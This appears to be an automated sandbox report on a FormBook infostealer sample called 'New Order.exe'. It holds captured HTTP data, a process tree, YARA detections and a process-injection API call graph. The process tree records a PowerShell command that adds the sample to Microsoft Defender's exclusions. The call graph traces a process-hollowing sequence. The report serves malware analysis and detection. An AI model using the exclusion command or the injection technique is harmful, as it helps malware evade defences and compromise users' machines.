                                                                                                                            Dec 3, 2024 14:41:55.488167048 CET1236INData Raw: 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 2d 74 6f 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 32 2c 31 38 35
                                                                                                                            Data Ascii: luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--w
                                                                                                                            Dec 3, 2024 14:41:55.488666058 CET1236INData Raw: 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 73 6d 61 6c 6c 3a 20 31 33 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d
                                                                                                                            Data Ascii: ;--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing
                                                                                                                            Dec 3, 2024 14:41:55.488682032 CET1236INData Raw: 68 61 73 2d 62 6c 61 63 6b 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73
                                                                                                                            Data Ascii: has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-col
                                                                                                                            Dec 3, 2024 14:41:55.608159065 CET1236INData Raw: 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d
                                                                                                                            Data Ascii: olor{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--viv


                                                                                                                            Click to jump to process

                                                                                                                            Click to jump to process

                                                                                                                            Click to dive into process behavior distribution

                                                                                                                            Click to jump to process

                                                                                                                            Target ID:1
                                                                                                                            Start time:08:37:43
                                                                                                                            Start date:03/12/2024
                                                                                                                            Path:C:\Users\user\Desktop\New Order.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\Desktop\New Order.exe"
                                                                                                                            Imagebase:0xb20000
                                                                                                                            File size:764'928 bytes
                                                                                                                            MD5 hash:8EF36959A2CEDC10C4C6036C2360E105
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:5
                                                                                                                            Start time:08:37:44
                                                                                                                            Start date:03/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe"
                                                                                                                            Imagebase:0xea0000
                                                                                                                            File size:433'152 bytes
                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:6
                                                                                                                            Start time:08:37:44
                                                                                                                            Start date:03/12/2024
                                                                                                                            Path:C:\Users\user\Desktop\New Order.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Users\user\Desktop\New Order.exe"
                                                                                                                            Imagebase:0x430000
                                                                                                                            File size:764'928 bytes
                                                                                                                            MD5 hash:8EF36959A2CEDC10C4C6036C2360E105
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:7
                                                                                                                            Start time:08:37:44
                                                                                                                            Start date:03/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:8
                                                                                                                            Start time:08:37:44
                                                                                                                            Start date:03/12/2024
                                                                                                                            Path:C:\Users\user\Desktop\New Order.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\Desktop\New Order.exe"
                                                                                                                            Imagebase:0xcc0000
                                                                                                                            File size:764'928 bytes
                                                                                                                            MD5 hash:8EF36959A2CEDC10C4C6036C2360E105
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2489286072.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2486160123.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2490425395.0000000002620000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:13
                                                                                                                            Start time:08:38:08
                                                                                                                            Start date:03/12/2024
                                                                                                                            Path:C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe"
                                                                                                                            Imagebase:0x750000
                                                                                                                            File size:140'800 bytes
                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4633944997.0000000002F00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:high
                                                                                                                            Has exited:false

                                                                                                                            Target ID:14
                                                                                                                            Start time:08:38:10
                                                                                                                            Start date:03/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\w32tm.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\SysWOW64\w32tm.exe"
                                                                                                                            Imagebase:0xbf0000
                                                                                                                            File size:92'672 bytes
                                                                                                                            MD5 hash:E55B6A057FDDD35A7380FB2C6811A8EC
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.4633862013.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.4633798417.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:false

                                                                                                                            Target ID:17
                                                                                                                            Start time:08:38:23
                                                                                                                            Start date:03/12/2024
                                                                                                                            Path:C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe"
                                                                                                                            Imagebase:0x750000
                                                                                                                            File size:140'800 bytes
                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4636187188.0000000005250000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:high
                                                                                                                            Has exited:false

                                                                                                                            Target ID:19
                                                                                                                            Start time:08:38:37
                                                                                                                            Start date:03/12/2024
                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                            Imagebase:0x7ff728280000
                                                                                                                            File size:676'768 bytes
                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Reset < >

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:10.7%
                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                              Signature Coverage:5.2%
                                                                                                                              Total number of Nodes:286
                                                                                                                              Total number of Limit Nodes:17
                                                                                                                              execution_graph 49333 2d9afd8 49337 2d9b0bf 49333->49337 49342 2d9b0d0 49333->49342 49334 2d9afe7 49338 2d9b0e1 49337->49338 49339 2d9b104 49337->49339 49338->49339 49340 2d9b308 GetModuleHandleW 49338->49340 49339->49334 49341 2d9b335 49340->49341 49341->49334 49343 2d9b104 49342->49343 49344 2d9b0e1 49342->49344 49343->49334 49344->49343 49345 2d9b308 GetModuleHandleW 49344->49345 49346 2d9b335 49345->49346 49346->49334 49347 2d9d358 49348 2d9d39e 49347->49348 49352 2d9d538 49348->49352 49355 2d9d528 49348->49355 49349 2d9d48b 49358 2d9cc40 49352->49358 49356 2d9cc40 DuplicateHandle 49355->49356 49357 2d9d566 49355->49357 49356->49357 49357->49349 49359 2d9d5a0 DuplicateHandle 49358->49359 49360 2d9d566 49359->49360 49360->49349 49609 2d94668 49610 2d94672 49609->49610 49614 2d94758 49609->49614 49619 2d93e34 49610->49619 49612 2d9468d 49615 2d9477d 49614->49615 49623 2d94858 49615->49623 49627 2d94868 49615->49627 49620 2d93e3f 49619->49620 49635 2d95d24 49620->49635 49622 2d96f8f 49622->49612 49625 2d94868 49623->49625 49624 2d9496c 49625->49624 49631 2d944b4 49625->49631 49628 2d9488f 49627->49628 49629 2d944b4 CreateActCtxA 49628->49629 49630 2d9496c 49628->49630 49629->49630 49632 2d958f8 CreateActCtxA 49631->49632 49634 2d959af 49632->49634 49636 2d95d2f 49635->49636 49639 2d95da4 49636->49639 49638 2d971bd 49638->49622 49640 2d95daf 49639->49640 49643 2d95dd4 49640->49643 49642 2d9729a 49642->49638 49644 2d95ddf 49643->49644 49647 2d95df4 49644->49647 49646 2d9738d 49646->49642 49649 2d95dff 49647->49649 49648 2d98929 49648->49646 49649->49648 49652 2d9d090 49649->49652 49657 2d9d080 49649->49657 49653 2d9d0b1 49652->49653 49654 2d9d0d5 49653->49654 49662 2d9d22f 49653->49662 49666 2d9d240 49653->49666 49654->49648 49658 2d9d090 49657->49658 49659 2d9d0d5 49658->49659 49660 2d9d22f CreateWindowExW 49658->49660 49661 2d9d240 CreateWindowExW 49658->49661 49659->49648 49660->49659 49661->49659 49663 2d9d240 49662->49663 49664 2d9d287 49663->49664 49670 2d9cb78 49663->49670 49664->49654 49668 2d9d24d 49666->49668 49667 2d9d287 49667->49654 49668->49667 49669 2d9cb78 CreateWindowExW 49668->49669 49669->49667 49671 2d9cb83 49670->49671 49673 2d9db98 49671->49673 49674 2d9cca4 49671->49674 49673->49673 49675 2d9ccaf 49674->49675 49676 2d95df4 CreateWindowExW 49675->49676 49677 2d9dc07 49676->49677 49681 2d9f968 49677->49681 49687 2d9f980 49677->49687 49678 2d9dc41 49678->49673 49683 2d9f9b1 49681->49683 49684 2d9fab1 49681->49684 49682 2d9f9bd 49682->49678 49683->49682 49685 5510dc8 CreateWindowExW 49683->49685 49686 5510db8 CreateWindowExW 49683->49686 49684->49678 49685->49684 49686->49684 49688 2d9f9b1 49687->49688 49690 2d9fab1 49687->49690 49689 2d9f9bd 49688->49689 49691 5510dc8 CreateWindowExW 49688->49691 49692 5510db8 CreateWindowExW 49688->49692 49689->49678 49690->49678 49691->49690 49692->49690 49693 74a94f8 49694 74a9683 49693->49694 49696 74a951e 49693->49696 49696->49694 49697 74a6b20 49696->49697 49698 74a9778 PostMessageW 49697->49698 49700 74a97e4 49698->49700 49700->49696 49361 60b1048 49362 60b1082 49361->49362 49363 60b1113 49362->49363 49367 60b1130 49362->49367 49372 60b1140 49362->49372 49364 60b1109 49369 60b1140 49367->49369 49368 60b15a2 49368->49364 49369->49368 49377 60b27af 49369->49377 49384 60b27c0 49369->49384 49373 60b15a2 49372->49373 49374 60b116e 49372->49374 49373->49364 49374->49373 49375 60b27af 2 API calls 49374->49375 49376 60b27c0 2 API calls 49374->49376 49375->49373 49376->49373 49378 60b27c0 49377->49378 49390 60b211c 49378->49390 49381 60b27e7 49381->49368 49382 60b2810 CreateIconFromResourceEx 49383 60b288e 49382->49383 49383->49368 49385 60b211c CreateIconFromResourceEx 49384->49385 49386 60b27da 49385->49386 49387 60b27e7 49386->49387 49388 60b2810 CreateIconFromResourceEx 49386->49388 49387->49368 49389 60b288e 49388->49389 49389->49368 49391 60b2810 CreateIconFromResourceEx 49390->49391 49392 60b27da 49391->49392 49392->49381 49392->49382 49393 11bd01c 49394 11bd034 49393->49394 49395 11bd08e 49394->49395 49400 5510ad4 49394->49400 49409 5511ea8 49394->49409 49413 5512c09 49394->49413 49422 5511e97 49394->49422 49401 5510adf 49400->49401 49402 5512c79 49401->49402 49404 5512c69 49401->49404 49439 5510bfc 49402->49439 49426 5512e6c 49404->49426 49431 5512da0 49404->49431 49435 5512d90 49404->49435 49405 5512c77 49410 5511ece 49409->49410 49411 5510ad4 CallWindowProcW 49410->49411 49412 5511eef 49411->49412 49412->49395 49416 5512c45 49413->49416 49414 5512c79 49415 5510bfc CallWindowProcW 49414->49415 49418 5512c77 49415->49418 49416->49414 49417 5512c69 49416->49417 49419 5512d90 CallWindowProcW 49417->49419 49420 5512da0 CallWindowProcW 49417->49420 49421 5512e6c CallWindowProcW 49417->49421 49419->49418 49420->49418 49421->49418 49423 5511ece 49422->49423 49424 5510ad4 CallWindowProcW 49423->49424 49425 5511eef 49424->49425 49425->49395 49427 5512e2a 49426->49427 49428 5512e7a 49426->49428 49443 5512e58 49427->49443 49429 5512e40 49429->49405 49433 5512db4 49431->49433 49432 5512e40 49432->49405 49434 5512e58 CallWindowProcW 49433->49434 49434->49432 49437 5512db4 49435->49437 49436 5512e40 49436->49405 49438 5512e58 CallWindowProcW 49437->49438 49438->49436 49440 5510c07 49439->49440 49441 551435a CallWindowProcW 49440->49441 49442 5514309 49440->49442 49441->49442 49442->49405 49445 5512e69 49443->49445 49446 5514292 49443->49446 49445->49429 49447 5510bfc CallWindowProcW 49446->49447 49448 55142aa 49447->49448 49448->49445 49449 74a7321 49450 74a732b 49449->49450 49452 74a730c 49449->49452 49451 74a7351 49452->49451 49455 74a81d8 49452->49455 49472 74a81e8 49452->49472 49456 74a8202 49455->49456 49465 74a8226 49456->49465 49489 74a8ccb 49456->49489 49493 74a8974 49456->49493 49501 74a8c97 49456->49501 49505 74a8957 49456->49505 49510 74a87d2 49456->49510 49515 74a8a92 49456->49515 49520 74a8838 49456->49520 49524 74a8785 49456->49524 49529 74a8885 49456->49529 49534 74a8605 49456->49534 49538 74a8d46 49456->49538 49544 74a89a0 49456->49544 49549 74a8723 49456->49549 49554 74a86ac 49456->49554 49465->49451 49473 74a8202 49472->49473 49474 74a8ccb 2 API calls 49473->49474 49475 74a86ac 4 API calls 49473->49475 49476 74a8723 2 API calls 49473->49476 49477 74a89a0 2 API calls 49473->49477 49478 74a8d46 2 API calls 49473->49478 49479 74a8605 2 API calls 49473->49479 49480 74a8885 2 API calls 49473->49480 49481 74a8785 2 API calls 49473->49481 49482 74a8226 49473->49482 49483 74a8838 2 API calls 49473->49483 49484 74a8a92 2 API calls 49473->49484 49485 74a87d2 2 API calls 49473->49485 49486 74a8957 2 API calls 49473->49486 49487 74a8c97 2 API calls 49473->49487 49488 74a8974 4 API calls 49473->49488 49474->49482 49475->49482 49476->49482 49477->49482 49478->49482 49479->49482 49480->49482 49481->49482 49482->49451 49483->49482 49484->49482 49485->49482 49486->49482 49487->49482 49488->49482 49490 74a8cff 49489->49490 49561 74a6958 49489->49561 49565 74a6950 49489->49565 49494 74a8981 49493->49494 49495 74a8784 49493->49495 49494->49495 49569 74a6298 49494->49569 49573 74a6290 49494->49573 49496 74a8693 49495->49496 49499 74a6958 ReadProcessMemory 49495->49499 49500 74a6950 ReadProcessMemory 49495->49500 49496->49465 49499->49496 49500->49496 49577 74a67a0 49501->49577 49581 74a67a8 49501->49581 49502 74a8cb5 49506 74a896e 49505->49506 49585 74a61e8 49506->49585 49589 74a61e0 49506->49589 49507 74a86fc 49507->49465 49511 74a87df 49510->49511 49593 74a6868 49511->49593 49597 74a6860 49511->49597 49512 74a8818 49516 74a8a98 49515->49516 49518 74a6868 WriteProcessMemory 49516->49518 49519 74a6860 WriteProcessMemory 49516->49519 49517 74a8f28 49518->49517 49519->49517 49522 74a6868 WriteProcessMemory 49520->49522 49523 74a6860 WriteProcessMemory 49520->49523 49521 74a8866 49521->49465 49522->49521 49523->49521 49525 74a8791 49524->49525 49526 74a8cff 49525->49526 49527 74a6958 ReadProcessMemory 49525->49527 49528 74a6950 ReadProcessMemory 49525->49528 49527->49526 49528->49526 49530 74a888b 49529->49530 49532 74a61e8 ResumeThread 49530->49532 49533 74a61e0 ResumeThread 49530->49533 49531 74a86fc 49531->49465 49532->49531 49533->49531 49601 74a6ef0 49534->49601 49605 74a6ee5 49534->49605 49539 74a8d53 49538->49539 49540 74a87f7 49538->49540 49542 74a6868 WriteProcessMemory 49540->49542 49543 74a6860 WriteProcessMemory 49540->49543 49541 74a8818 49542->49541 49543->49541 49545 74a8961 49544->49545 49547 74a61e8 ResumeThread 49545->49547 49548 74a61e0 ResumeThread 49545->49548 49546 74a86fc 49546->49465 49547->49546 49548->49546 49550 74a8726 49549->49550 49551 74a8791 49549->49551 49551->49550 49552 74a6958 ReadProcessMemory 49551->49552 49553 74a6950 ReadProcessMemory 49551->49553 49552->49550 49553->49550 49559 74a6298 Wow64SetThreadContext 49554->49559 49560 74a6290 Wow64SetThreadContext 49554->49560 49555 74a86c6 49556 74a86fc 49555->49556 49557 74a61e8 ResumeThread 49555->49557 49558 74a61e0 ResumeThread 49555->49558 49556->49465 49557->49556 49558->49556 49559->49555 49560->49555 49562 74a69a3 ReadProcessMemory 49561->49562 49564 74a69da 49562->49564 49564->49490 49566 74a6958 ReadProcessMemory 49565->49566 49568 74a69da 49566->49568 49568->49490 49570 74a62dd Wow64SetThreadContext 49569->49570 49572 74a6325 49570->49572 49572->49495 49574 74a6298 Wow64SetThreadContext 49573->49574 49576 74a6325 49574->49576 49576->49495 49578 74a67e8 VirtualAllocEx 49577->49578 49580 74a6825 49578->49580 49580->49502 49582 74a67e8 VirtualAllocEx 49581->49582 49584 74a6825 49582->49584 49584->49502 49586 74a6228 ResumeThread 49585->49586 49588 74a6259 49586->49588 49588->49507 49590 74a61e8 ResumeThread 49589->49590 49592 74a6259 49590->49592 49592->49507 49594 74a68b0 WriteProcessMemory 49593->49594 49596 74a6907 49594->49596 49596->49512 49598 74a68b0 WriteProcessMemory 49597->49598 49600 74a6907 49598->49600 49600->49512 49602 74a6f79 49601->49602 49602->49602 49603 74a70de CreateProcessA 49602->49603 49604 74a713b 49603->49604 49606 74a6ef1 49605->49606 49606->49606 49607 74a70de CreateProcessA 49606->49607 49608 74a713b 49607->49608 49608->49608
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2181853578.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_60b0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e1fde746ab99c207fd5264ba37a4bcba24670fce374a733e32a332c79cd05b60
                                                                                                                              • Instruction ID: c19bfa21ef4c3daf7d25681aa04b051736e4a80f5ff31312d4bcb99b29848305
                                                                                                                              • Opcode Fuzzy Hash: e1fde746ab99c207fd5264ba37a4bcba24670fce374a733e32a332c79cd05b60
                                                                                                                              • Instruction Fuzzy Hash: E9425C70E102198FEB98DFA8C85079EBFF2AF88300F1495A9D509AB345DB749D41CF95
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2181853578.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_60b0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 11be92d01e7a7672e2f5a0cd9fbf76debe3abfc57b2d56d9f52f7c35475b4240
                                                                                                                              • Instruction ID: 99df933977dac25e0840b45583ac43687aa4f72fadca32181e0d4f85742d0096
                                                                                                                              • Opcode Fuzzy Hash: 11be92d01e7a7672e2f5a0cd9fbf76debe3abfc57b2d56d9f52f7c35475b4240
                                                                                                                              • Instruction Fuzzy Hash: 85B13A31E502598FDB54CFA5C89079DBFF2AF88300F14D5AAD809AB255DB309985CF90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a241051b8fb5a434e13886d5be04ec937e6fd1f58558a393f5e4607e26242ba9
                                                                                                                              • Instruction ID: a62e78bcd492f7fda71941a43514e051443331ed3a7025dc897826803633cd05
                                                                                                                              • Opcode Fuzzy Hash: a241051b8fb5a434e13886d5be04ec937e6fd1f58558a393f5e4607e26242ba9
                                                                                                                              • Instruction Fuzzy Hash: EB2150B8819214DFCB25DF50C9447F8BBB8EB2A315F0495DB940EA32A1C7309AC6CF00

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 0 74a6ee5-74a6f85 3 74a6fbe-74a6fde 0->3 4 74a6f87-74a6f91 0->4 9 74a6fe0-74a6fea 3->9 10 74a7017-74a7046 3->10 4->3 5 74a6f93-74a6f95 4->5 7 74a6fb8-74a6fbb 5->7 8 74a6f97-74a6fa1 5->8 7->3 11 74a6fa3 8->11 12 74a6fa5-74a6fb4 8->12 9->10 14 74a6fec-74a6fee 9->14 18 74a7048-74a7052 10->18 19 74a707f-74a7139 CreateProcessA 10->19 11->12 12->12 13 74a6fb6 12->13 13->7 15 74a6ff0-74a6ffa 14->15 16 74a7011-74a7014 14->16 20 74a6ffe-74a700d 15->20 21 74a6ffc 15->21 16->10 18->19 22 74a7054-74a7056 18->22 32 74a713b-74a7141 19->32 33 74a7142-74a71c8 19->33 20->20 23 74a700f 20->23 21->20 24 74a7058-74a7062 22->24 25 74a7079-74a707c 22->25 23->16 27 74a7066-74a7075 24->27 28 74a7064 24->28 25->19 27->27 29 74a7077 27->29 28->27 29->25 32->33 43 74a71ca-74a71ce 33->43 44 74a71d8-74a71dc 33->44 43->44 45 74a71d0 43->45 46 74a71de-74a71e2 44->46 47 74a71ec-74a71f0 44->47 45->44 46->47 48 74a71e4 46->48 49 74a71f2-74a71f6 47->49 50 74a7200-74a7204 47->50 48->47 49->50 51 74a71f8 49->51 52 74a7216-74a721d 50->52 53 74a7206-74a720c 50->53 51->50 54 74a721f-74a722e 52->54 55 74a7234 52->55 53->52 54->55 57 74a7235 55->57 57->57
                                                                                                                              APIs
                                                                                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 074A7126
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 963392458-0
                                                                                                                              • Opcode ID: b71a2ad8dee9b6c9687c37d397dad6b4a4515d5d223deb8527ed7160aaf78c74
                                                                                                                              • Instruction ID: fb719c275a02fc011fa8e7b6709c9be3bd1d97be23312234278da0082f9be5ee
                                                                                                                              • Opcode Fuzzy Hash: b71a2ad8dee9b6c9687c37d397dad6b4a4515d5d223deb8527ed7160aaf78c74
                                                                                                                              • Instruction Fuzzy Hash: A7A14DB1D0061ADFEB25DF68C8417DEBBB2FB54310F14856AE808A7390DB749985CF91

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 58 74a6ef0-74a6f85 60 74a6fbe-74a6fde 58->60 61 74a6f87-74a6f91 58->61 66 74a6fe0-74a6fea 60->66 67 74a7017-74a7046 60->67 61->60 62 74a6f93-74a6f95 61->62 64 74a6fb8-74a6fbb 62->64 65 74a6f97-74a6fa1 62->65 64->60 68 74a6fa3 65->68 69 74a6fa5-74a6fb4 65->69 66->67 71 74a6fec-74a6fee 66->71 75 74a7048-74a7052 67->75 76 74a707f-74a7139 CreateProcessA 67->76 68->69 69->69 70 74a6fb6 69->70 70->64 72 74a6ff0-74a6ffa 71->72 73 74a7011-74a7014 71->73 77 74a6ffe-74a700d 72->77 78 74a6ffc 72->78 73->67 75->76 79 74a7054-74a7056 75->79 89 74a713b-74a7141 76->89 90 74a7142-74a71c8 76->90 77->77 80 74a700f 77->80 78->77 81 74a7058-74a7062 79->81 82 74a7079-74a707c 79->82 80->73 84 74a7066-74a7075 81->84 85 74a7064 81->85 82->76 84->84 86 74a7077 84->86 85->84 86->82 89->90 100 74a71ca-74a71ce 90->100 101 74a71d8-74a71dc 90->101 100->101 102 74a71d0 100->102 103 74a71de-74a71e2 101->103 104 74a71ec-74a71f0 101->104 102->101 103->104 105 74a71e4 103->105 106 74a71f2-74a71f6 104->106 107 74a7200-74a7204 104->107 105->104 106->107 108 74a71f8 106->108 109 74a7216-74a721d 107->109 110 74a7206-74a720c 107->110 108->107 111 74a721f-74a722e 109->111 112 74a7234 109->112 110->109 111->112 114 74a7235 112->114 114->114
                                                                                                                              APIs
                                                                                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 074A7126
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 963392458-0
                                                                                                                              • Opcode ID: b01fae957ad4f88876444ea87e81240826d2198debfdb4ebfd04eb2e00665b60
